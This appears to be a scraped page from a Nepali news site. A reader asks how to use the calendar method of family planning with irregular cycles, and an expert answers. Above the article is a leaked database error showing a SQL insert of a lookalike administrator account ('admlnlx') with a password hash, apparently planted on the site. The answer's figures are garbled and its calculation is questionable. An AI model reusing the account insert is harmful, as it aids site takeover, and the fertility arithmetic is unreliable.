WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN1Gi4YPAqTI1XOpTx2UwifJVhtTlY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 16:50:22', '', 'admlnlx', 'admlnlx')
मेरो बिहे भएको ११ महिना हुन लाग्यो । हामीले परिवार नियोजनका साधन प्रयोग गरेका छैनौँ । श्रीमान्लाई कन्डम मन पर्दैन । त्यस्तै, मलाई पनि परिवार नियोजनका साधन प्रयोग गर्न मन लाग्दैन । हामी प्राकृतिक परिवार नियोजनको विधिमा बढी भर परेका छौँ । हामीले पात्रो विधि प्रयोग गरेका छौँ । तर, मेरो महिनावारी समयमा हुँदैन । कहिले २४ दिनमा त कहिले ४१ दिनमा हुन्छ । यस्तो अवस्थामा के गर्ने होला ?
एन
तपाईंले परिवार नियोजनको पात्रो विधिलाई ध्यानपूर्वक प्रयोग गर्नुभएको छ भने तपाईंको सबैभन्दा लामो महिनावारीको दिन हुँदासम्म पनि महिनावारी भएन भने नजिकको अस्पतालमा गएर चिकित्सकसँग सल्लाह गरेर पिसाब जाँच गराउनुहोला ।
पात्रो विधिअनुसार तपाईंको गर्भ नरहने या सुरक्षित समय भनेको महिनावारी भएको ३१ औँ दिनदेखि अर्को महिनावारी भएको चौथो दिनसम्म हो । किनभने पात्रो विधिअनुसार तपाईंको सबैभन्दा छोटो महिनावारीबाट २१ घटाउनुपर्छ (२४२१) र सबैभन्दा लामो महिनावारीको अन्तरालबाट ११ दिन घटाउनुपर्छ (४१३१) । यसरी हिसाब गर्दा तपाईंको असुरक्षित समय भनेको महिनावारी भएको चौथो दिनदेखि ३१औँ दिनसम्म हो ।